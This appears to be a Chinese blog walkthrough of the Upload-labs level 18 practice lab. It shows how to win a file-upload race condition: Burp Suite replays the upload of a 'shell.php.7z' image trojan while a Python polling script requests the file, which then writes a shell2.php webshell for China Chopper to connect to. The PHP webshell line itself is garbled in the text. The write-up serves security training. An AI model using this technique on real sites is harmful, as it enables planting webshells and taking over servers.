Upload-labs 18 条件竞争

访问目标站点,提示上传图片马
Upload-labs 18 条件竞争_第1张图片
查看源码
Upload-labs 18 条件竞争_第2张图片
思路:上传shell.php.7z图片木马配合解析漏洞

实验步骤:

图片中php一句话木马代码:’);?>

第一种:使用python脚本

第一步:burpsuite抓包,上传文件名字shell.php.7z,在图片信息最下方是一句话木马:’);?>(只要被成功当作PHP文件解析,就会生成shell2.php木马文件)
Upload-labs 18 条件竞争_第3张图片
第二步:python脚本打开并运行
python内容:

import requests
url = "http://127.0.0.1/upload-labs/upload/shell.php.7z"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
	    print("NO")

Upload-labs 18 条件竞争_第4张图片
第三步:在python脚本运行后,burpsuite开始无限制重放数据包
Upload-labs 18 条件竞争_第5张图片
直到python脚本出现OK,才关闭burpsuite
Upload-labs 18 条件竞争_第6张图片
第四步:访问生成的shell2.php文件
Upload-labs 18 条件竞争_第7张图片
中国菜刀连接即可
Upload-labs 18 条件竞争_第8张图片
Upload-labs 18 条件竞争_第9张图片
第二种:不使用python脚本
burpsuite与第一种方法一样,无限重放数据包,在无限重放数据包的同时,要一直访问shell.php.7z文件
Upload-labs 18 条件竞争_第10张图片
直到出现如下界面,说明竞争成功,成功执行shell.php.7z生成shell2.php木马文件

Upload-labs 18 条件竞争_第11张图片
中国菜刀连接即可

你可能感兴趣的:(文件上传)